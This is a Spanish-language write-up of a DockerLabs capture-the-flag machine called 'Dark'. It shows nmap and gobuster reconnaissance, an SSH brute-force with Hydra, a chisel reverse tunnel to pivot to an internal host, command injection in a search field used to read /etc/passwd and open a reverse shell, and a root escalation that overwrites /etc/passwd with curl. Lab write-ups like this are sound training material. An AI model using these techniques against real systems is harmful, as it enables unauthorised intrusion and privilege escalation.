romabri@home:~$

Dark - DockerLabs

OS Dificultad Creator
Linux Medio Mishineti

Escaneo y Reconocimiento de puertos

Con ARP scan miramos que IP’s tenemos disponibles.

imagen

Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.

imagen

nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2

  • -p-: Escanea todos los puertos (1-65535).
  • --open: Solo muestra los puertos abiertos.
  • -sS: Realiza un escaneo SYN, que es rápido y discreto.
  • -sC: Utiliza los scripts de reconocimiento por defecto de Nmap.
  • -sV: Detecta la versión del servicio en los puertos abiertos.
  • --min-rate=5000: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.
  • -n: No realiza resolución DNS.
  • -Pn: No realiza ping previo para determinar si el host está activo.
  • -vvv: Muestra resultados detallados y en tiempo real.

Vemos que esta abierto el puerto 22 SSH y el puerto 80 HTTP

Enumeración Web

Si accedemos a la pagina web vemos lo siguiente

imagen

Usamos Gobuster para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

  • gobuster dir - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.
  • -u http://172.20.10.5/ Especifica la URL objetivo que deseas escanear en busca de directorios.
  • -w Especifica que diccionario queremos usar
  • -x Para indicar que tipo de extension queremos que nos encuentre

Gobuster ha encontrado diferentes direcotrios

imagen

Si accedemos al repositorio info vemos lo siguiente:

imagen

Tenemos un posible usuario para poder acceder vía SSH vamos hacer fuerza bruta.

Ataque de fuerza bruta con Hydra

Como tenemos un posible usuario, vamos hacer un ataque de fuerza bruta con Hydra al protocolo SSH de la siguiente forma:

hydra -l toni -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2

  • -l - Para especificar el usaurio
  • -P - Para especificar que diccionario de fuerza bruta usaremos
  • ssh://10.10.10.2 - Especificamos que queremos atentar contra el protocolo SSH de la IP victima
  • imagen

Como vemos, existe el usuario toni y la contraseña es banana.

Intrusión

Ahora accedemos vía SSH

ssh toni@172.17.0.2

imagen

Vemos que tiene otra interfaz de red

imagen

No veo la forma de como escalar privilegios en esta maquina ni con linpeas así que vamos a pasarnos chisel a esta maquina con curl y vamos a generar el tunel para redirigir el trafico de la 20.20.20.3 a nuestra maquina.

Nos pasamos el chisel a la maquina 10.10.10.2.

Ahora desde la máquina atacante nos ponemos en escucha con chisel.

chisel server --reverse -p 1234

Y en la maquina victima con IP 10.10.10.2 configuramos el chisel para que podamos ver desde la maquina 10.10.10.1 la IP 20.20.20.2.

./chisel client 10.10.10.1:1234 R:socks

imagen

imagen

Genial ya nos funciona como nos decía que tenia una web donde había subido la base de datos de la DGT etc…,vamos a configurar foxyproxy para acceder a la web de esa IP.

imagen

Ahora si accedemos a la IP 20.20.20.3 vemos lo siguiente:

imagen

Vamos a pasar-le gobuster haber si encuentra algún directorio interesante.

imagen

no encontramos nada interesante, entonces vamos a probar de ingresar algo en el campo de busqueda.

imagen

imagen

Vemos que nos muestra información del sistema

Ahora vamos a listar el /etc/passwd

imagen

No vemos un posible usuario para hacer fuerza bruta entoces lo que voy hacer sera mandarme una reverse shell

Lo que podemos hacer es mandarnos una reverse shell a la maquina 20.20.20.2

imagen

imagen

Al estar investigando un rato vemos que no hay nada interesante para poder escalar privilegios lo que podemos hacer es usar curl para poder modificar el archivo /etc/passwd y así acceder al root.

Veamos como se hace esto

imagen

Copiamos el passwd a la carpeta /tmp

imagen

Ahora eliminamos la primera x que tiene root y guardamos

Ahora hacemos el siguiente comadno

curl file:///tmp/passwd -o /etc/passwd

imagen

Si hacemos un cat a /etc/passwd ahora vemos que en root ya no tiene la x.

Esto sucede debido a cómo se manejan los permisos y la propiedad del archivo en Linux

Ahora solo queda hacer su root y escalaremos a root sin necesidad de introducir contraseña

imagen

Ya somos ROOT